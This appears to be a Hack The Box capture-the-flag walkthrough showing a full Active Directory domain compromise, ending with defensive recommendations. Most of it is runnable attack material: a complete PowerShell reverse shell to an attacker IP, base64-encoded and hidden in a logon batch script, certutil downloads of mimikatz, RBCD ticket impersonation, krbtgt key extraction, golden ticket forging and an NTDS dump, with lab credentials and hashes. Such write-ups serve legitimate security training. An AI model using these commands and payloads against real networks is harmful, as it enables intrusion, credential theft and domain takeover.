Complete Penetration Testing Walkthrough: HTB Season 10 Garfield Active Directory Compromise

Introduction

This comprehensive walkthrough documents the complete penetration testing methodology employed against the Garfield machine from Hack The Box Season 10. The target represents a sophisticated Windows Active Directory environment, presenting multiple attack vectors that demonstrate real-world domain compromise scenarios. Understanding these techniques is crucial for security professionals tasked with defending enterprise networks against advanced persistent threats.

The engagement follows a structured approach: initial reconnaissance, service enumeration, credential harvesting, lateral movement, and final privilege escalation to domain administrator level. Each phase builds upon discoveries from the previous stage, illustrating how seemingly minor misconfigurations can cascade into complete domain compromise.

Phase 1: Initial Reconnaissance and Service Enumeration

Network Scanning Methodology

The penetration test begins with comprehensive network reconnaissance using Nmap, the industry-standard network discovery and security auditing tool. The aggressive scan parameters (-A -T4) provide detailed service version detection, operating system fingerprinting, and script scanning capabilities.

nmap -A -T4 10.129.83.35

Scan Results Analysis

The Nmap output reveals a Windows Server 2019 domain controller with the following characteristics:

Target Identification:

• Hostname: DC01.garfield.htb
• Domain: GARFIELD (garfield.htb)
• Operating System: Windows Server 2019 (Build 10.0.17763)
• Role: Primary Domain Controller (PDC)

Open Ports and Services:

Security Implications

Several critical observations emerge from this enumeration:

1. SMB Signing Enforcement: The smb2-security-mode output indicates that SMB signing is both enabled and required. This configuration significantly complicates traditional SMB relay attacks, as attackers cannot simply intercept and forward authentication attempts without valid signatures.
2. Certificate Information Disclosure: The RDP SSL certificate reveals internal hostnames and domain structure, providing valuable intelligence for subsequent attack phases.
3. Time Synchronization Discrepancy: An 8-hour clock skew between the attacker's system and the target suggests potential timezone misconfiguration or the target operating in a different geographic region.
4. Port Filtering: 986 filtered TCP ports indicate aggressive firewall rules, with only essential Active Directory services exposed. This hardened posture requires targeted attack strategies rather than broad scanning approaches.

Phase 2: Credential Enumeration and Initial Access

SMB Share Enumeration with NetExec

With initial credentials obtained through unspecified means (likely from prior engagement phases or credential leaks), we enumerate accessible resources using NetExec (formerly CrackMapExec):

nxc smb 10.129.83.35 -u 'j.arbuckle' -p 'Th1sD4mnC4t!@1978' --shares
nxc smb 10.129.83.35 -u 'j.arbuckle' -p 'Th1sD4mnC4t!@1978' --users

Discovery of Writable Objects

The enumeration reveals two user accounts with writable permissions:

• l.wilson (standard user)
• l.wilson_adm (administrative user)

Using bloodyAD, an Active Directory exploitation tool, we query writable domain objects:

bloodyAD --host 10.129.195.195 -u 'j.arbuckle' -p 'Th1sD4mnC4t!@1978' get writable

Critical Finding: DNS Zone Write Permissions

The output reveals write permissions on garfield.htb and _msdcs.garfield.htb DNS zones. This represents a severe misconfiguration enabling ADIDNS (Active Directory Integrated DNS) poisoning attacks. Attackers with these permissions can create arbitrary DNS records, facilitating:

• WPAD (Web Proxy Auto-Discovery) hijacking
• SMB relay attacks via spoofed infrastructure
• Phishing campaigns using legitimate domain subdomains
• Service principal name (SPN) manipulation

Password Reset Attempt

Initial attempts to directly reset the l.wilson password fail due to insufficient privileges:

bloodyAD --host 10.129.195.195 -u 'j.arbuckle' -p 'Th1sD4mnC4t!@1978' set password l.wilson 'NewPass@123!'

Error Analysis: The current user (j.arbuckle) possesses generic WRITE permissions but lacks the specific User-Change-Password extended right. This distinction highlights the granular nature of Active Directory permissions, where general write access doesn't automatically confer password modification capabilities.

Phase 3: Group Policy Object Exploitation

SYSVOL Share Access

The attacker accesses the SYSVOL share, a critical Active Directory component storing Group Policy Objects (GPOs), login scripts, and domain-wide configuration files:

smbclient //10.129.195.195/SYSVOL -U 'j.arbuckle'
cd garfield.htb\scripts
ls

Understanding the Attack Vector

The SYSVOL\scripts directory contains domain login scripts that execute automatically when users authenticate to the domain. By placing malicious code in this location and configuring user objects to reference these scripts, attackers achieve persistent code execution across domain-joined systems.

Payload Generation

A PowerShell reverse shell payload is generated with the following characteristics:

$client = New-Object System.Net.Sockets.TCPClient("10.10.16.6",9001);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){
    $data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);
    $sendback=(iex $data 2>&1|Out-String);
    $sendback2=$sendback+"PS "+(pwd).Path+"> ";
    $sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush()
};
$client.Close()

Technical Explanation:

• Establishes a TCP connection to the attacker's listener on port 9001
• Implements a command loop that reads, executes, and returns output
• Uses .NET classes for encoding and stream manipulation
• Provides an interactive PowerShell prompt experience

Encoding and Obfuscation

The payload undergoes encoding to bypass basic security controls:

echo '$client = New-Object...' | iconv -t UTF-16LE | base64 -w0

UTF-16LE Encoding: PowerShell's -EncodedCommand parameter expects UTF-16LE encoded input, enabling execution of complex scripts without special character escaping issues.

Base64 Encoding: Provides basic obfuscation and ensures safe transmission through various protocols.

Batch File Wrapper

A batch file wrapper facilitates execution through Group Policy:

@echo off
powershell -NoP -NonI -W Hidden -Exec Bypass -Enc <BASE64_PAYLOAD>

Parameter Breakdown:

• -NoP: No Profile - prevents loading user PowerShell profiles
• -NonI: Non-Interactive - runs without user interaction
• -W Hidden: Window Style Hidden - conceals the PowerShell window
• -Exec Bypass: Execution Policy Bypass - circumvents script execution restrictions

Payload Deployment

The malicious batch file is uploaded to the SYSVOL share:

smbclient //10.129.195.195/SYSVOL -U 'j.arbuckle'
cd garfield.htb\scripts
put printerDetect.bat printerDetect.bat

GPO Script Path Modification

Using bloodyAD, the attacker modifies the scriptPath attribute of the l.wilson user object:

bloodyAD --host 10.129.195.195 -u 'j.arbuckle' -p 'Th1sD4mnC4t!@1978' \
set object "CN=Liz Wilson,CN=Users,DC=garfield,DC=htb" \
scriptPath -v printerDetect.bat

Impact: When l.wilson next logs in, the domain controller processes the scriptPath attribute, causing the malicious batch file to execute with the user's privileges. This technique provides initial shell access to the domain environment.

Phase 4: Lateral Movement and Privilege Escalation

Credential Harvesting and Password Reset

With initial shell access as l.wilson, the attacker targets the higher-privileged l.wilson_adm account:

Set-ADAccountPassword -Identity "l.wilson_adm" -NewPassword (ConvertTo-SecureString 'WhoKnows123!' -AsPlainText -Force) -Reset

Prerequisites: This command requires the Reset Password extended right on the target user object, which the attacker obtained through the earlier writable object enumeration.

WinRM Access Verification

NetExec confirms successful credential reset and WinRM accessibility:

nxc winrm 10.129.195.195 -u 'l.wilson_adm' -p 'WhoKnows123!'

Interactive Shell Acquisition

Evil-WinRM provides an enhanced PowerShell remoting experience:

evil-winrm -i 10.129.195.195 -u l.wilson_adm -p 'WhoKnows123!'

Phase 5: Read-Only Domain Controller Exploitation

Environment Discovery

Post-compromise reconnaissance reveals additional infrastructure:

• RODC01.garfield.htb (192.168.100.2) - Read-Only Domain Controller
• DC01.garfield.htb (192.168.100.1) - Primary Domain Controller

The l.wilson_adm account belongs to the GARFIELD\Tier 1 group, granting administrative privileges over server-tier systems including the RODC.

RODC Administrator Group Addition

The attacker adds their account to the RODC Administrators group:

Add-ADGroupMember -Identity "RODC Administrators" -Members "l.wilson_adm"

Strategic Significance:

• RODC Administrators can modify password replication policies
• Enables caching of high-value credentials (including domain administrator)
• Standard AD management group with reduced audit scrutiny
• Provides pathway to extract krbtgt keys for Golden Ticket attacks

Network Tunnel Establishment with Ligolo-ng

To access the isolated RODC network segment, the attacker establishes a tunnel using Ligolo-ng:

Kali Setup:

wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz
tar -xzf ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz
sudo ip tuntap add user root mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert -laddr 0.0.0.0:11601

Windows Agent Deployment:

Invoke-WebRequest -Uri "http://10.10.16.9:80/agent.exe" -OutFile "agent.exe"
.\agent.exe -connect 10.10.16.9:11601 -ignore-cert

Kali Network Configuration:

sudo ip addr add 10.10.16.9/23 dev ligolo
sudo ip route add 192.168.100.0/24 dev tun1

Ligolo-ng Session Management:

ligolo-ng > session
ligolo-ng > session 1
ligolo-ng > start

Phase 6: Resource-Based Constrained Delegation (RBCD) Attack

Fake Computer Account Creation

The attacker creates a controlled machine account for the RBCD attack:

impacket-addcomputer garfield.htb/l.wilson_adm:'WhoKnows123!' \
-computer-name 'FAKE$' \
-computer-pass 'FakePass123!' \
-dc-ip 10.129.196.71

Verification:

nxc ldap 10.129.196.71 -u l.wilson_adm -p 'WhoKnows123!' --users | grep FAKE

RBCD Configuration

The attacker configures the RODC01 computer object to allow delegation from the FAKE$ account:

Set-ADComputer RODC01 -PrincipalsAllowedToDelegateToAccount FAKE$
Get-ADComputer RODC01 -Properties PrincipalsAllowedToDelegateToAccount

Technical Background:
Resource-Based Constrained Delegation allows a resource (RODC01) to specify which principals (FAKE$) can obtain service tickets on its behalf. This modern delegation model replaces the older Constrained Delegation approach and is frequently misconfigured in enterprise environments.

Service Ticket Request and Impersonation

Using impacket-getST, the attacker requests a service ticket while impersonating the Domain Administrator:

impacket-getST garfield.htb/'FAKE$':'FakePass123!' \
-spn cifs/RODC01.garfield.htb \
-impersonate Administrator \
-dc-ip 10.129.196.71

Time Synchronization:

ntpdate 10.129.196.71

Kerberos authentication requires tight time synchronization (typically within 5 minutes) between client and domain controller.

Remote Execution with PsExec

The stolen service ticket enables remote command execution:

export KRB5CCNAME=$(pwd)/Administrator@cifs_RODC01.garfield.htb@GARFIELD.HTB.ccache
impacket-psexec -k -no-pass \
-dc-ip 10.129.196.71 \
-target-ip 192.168.100.2 \
garfield.htb/Administrator@RODC01.garfield.htb

Phase 7: RODC Credential Extraction

Mimikatz Deployment

Mimikatz, the premier Windows credential extraction tool, is deployed to the compromised RODC:

Kali HTTP Server:

cp /usr/share/windows-resources/mimikatz/x64/mimikatz.exe /tmp/
cd /tmp
python3 -m http.server 8888

RODC Download and Execution:

cd C:\Windows\Temp
certutil -urlcache -split -f http://10.10.16.9:80/mimikatz.exe mimikatz.exe
mimikatz.exe

LSASS Memory Dump

Within Mimikatz:

privilege::debug
lsadump::lsa /inject /name:krbtgt_8245

Output:

AES256: d6c93cbe006372adb8403630f9e86594f52c8105a52f9b21fef62e9c7a75e240
SID: S-1-5-21-2502726253-3859040611-225969357
RODC Number: 8245

Critical Finding: The extracted AES256 key belongs to the krbtgt account, the Kerberos Ticket Granting Ticket service. Possession of this key enables creation of undetectable Golden Tickets granting unlimited domain access.

Phase 8: Password Replication Policy Modification

PowerView Deployment

PowerView, a PowerShell toolkit for Active Directory enumeration and manipulation, is deployed:

cd C:\Users\l.wilson_adm\Desktop
certutil -urlcache -split -f http://10.10.16.9:80/PowerView.ps1 PowerView.ps1
Set-ExecutionPolicy Bypass -Scope Process
Import-Module .\PowerView.ps1

RODC Password Replication Policy Manipulation

The attacker modifies the RODC's password replication policy to explicitly allow Administrator credential caching:

Set-DomainObject -Identity RODC01$ -Set @{
 'msDS-RevealOnDemandGroup'=@(
 'CN=Allowed RODC Password Replication Group,CN=Users,DC=garfield,DC=htb',
 'CN=Administrator,CN=Users,DC=garfield,DC=htb'
 )
}

Set-DomainObject -Identity RODC01$ -Clear 'msDS-NeverRevealGroup'

Attribute Explanation:

Verification:

Get-ADComputer RODC01 -Properties msDS-RevealOnDemandGroup,msDS-NeverRevealGroup

Phase 9: Golden Ticket Attack

Rubeus Deployment

Rubeus, a C# Kerberos attack toolkit, is deployed for Golden Ticket generation:

wget https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_x64/Rubeus.exe -O /tmp/Rubeus.exe

Golden Ticket Generation

.\Rubeus.exe golden `
/rodcNumber:8245 `
/flags:forwardable,renewable,enc_pa_rep `
/nowrap `
/outfile:ticket.kirbi `
/aes256:d6c93cbe006372adb8403630f9e86594f52c8105a52f9b21fef62e9c7a75e240 `
/user:Administrator `
/id:500 `
/domain:garfield.htb `
/sid:S-1-5-21-2502726253-3859040611-225969357

Parameter Breakdown:

• /rodcNumber: Specifies the RODC number for key derivation
• /flags: Sets ticket flags (forwardable, renewable, encrypted PA-REP)
• /aes256: The extracted krbtgt AES256 key
• /user:Administrator: Target username (RID 500)
• /domain: Target domain FQDN
• /sid: Domain SID for proper ticket construction

KeyList Attack for TGS

.\Rubeus.exe asktgs `
/enctype:aes256 `
/keyList `
/service:krbtgt/garfield.htb `
/dc:DC01.garfield.htb `
/ticket:ticket_2026_04_10_22_51_40_Administrator_to_krbtgt@GARFIELD.HTB.kirbi `
/nowrap

The KeyList attack requests a TGS (Ticket Granting Service) ticket using the stolen krbtgt key, enabling authentication as any domain user.

Ticket Conversion and Export

The base64-encoded ticket is processed on Kali:

sed -i 's/^[[:space:]]*//' ticket.b64
tr -d '\r\n\t ' < ticket.b64 | base64 -d > ticket.kirbi
impacket-ticketConverter ticket.kirbi ticket.ccache
export KRB5CCNAME=ticket.ccache

Format Conversion: The .kirbi format (Kerberos ticket file) is converted to .ccache (credential cache) format compatible with Impacket tools.

Phase 10: Domain Controller Compromise

NTDS.dit Extraction

With a valid Administrator TGT, the attacker extracts the Active Directory database:

nxc smb DC01.garfield.htb --use-kcache --ntds

NTDS.dit Significance: This file contains the entire Active Directory database, including:

• All user and computer account password hashes
• Group memberships and permissions
• Group Policy Object configurations
• Kerberos keys and encryption data

Final Domain Administrator Access

evil-winrm -i 10.129.196.71 -u Administrator -H 'ee238f6debc752010428f20875b092d5'

Complete Domain Compromise Achieved.

Conclusions and Defensive Recommendations

Attack Chain Summary

This engagement demonstrated a complete Active Directory compromise through the following progression:

1. Initial Reconnaissance → Domain controller identification
2. Credential Enumeration → Discovery of writable objects
3. GPO Exploitation → Login script injection for initial access
4. Lateral Movement → Password reset and privilege escalation
5. RODC Compromise → krbtgt key extraction
6. Golden Ticket → Undetectable persistent domain access

Key Defensive Recommendations

1. Audit Writable Object Permissions

• Regularly review delegated permissions using tools like BloodHound
• Implement least-privilege principles for AD object modifications
• Monitor for unusual permission grants on DNS zones

2. Secure SYSVOL Access

• Restrict SYSVOL write permissions to Domain Admins only
• Implement file integrity monitoring on login script directories
• Audit GPO modifications with SIEM integration

3. RODC Security Hardening

• Carefully evaluate RODC deployment requirements
• Implement strict Password Replication Policies
• Monitor RODC administrator group membership changes

4. Kerberos Security Enhancements

• Enable Kerberos Armoring (FAST)
• Implement Protected Users security group
• Regularly rotate krbtgt password (minimum twice, 10+ hours apart)

5. Network Segmentation

• Isolate domain controllers in dedicated network segments
• Implement strict firewall rules between tiers
• Deploy network monitoring for lateral movement detection

6. Credential Protection

• Deploy Windows Defender Credential Guard
• Enable LSA Protection
• Implement Just-In-Time (JIT) administrative access

Final Thoughts

This walkthrough illustrates how multiple seemingly minor misconfigurations can combine to enable complete domain compromise. Defense-in-depth strategies, continuous monitoring, and regular security assessments are essential for protecting Active Directory environments against sophisticated adversaries.

Security professionals must understand these attack techniques not to enable malicious activity, but to build more resilient defenses and detect adversarial behaviors before they achieve their objectives.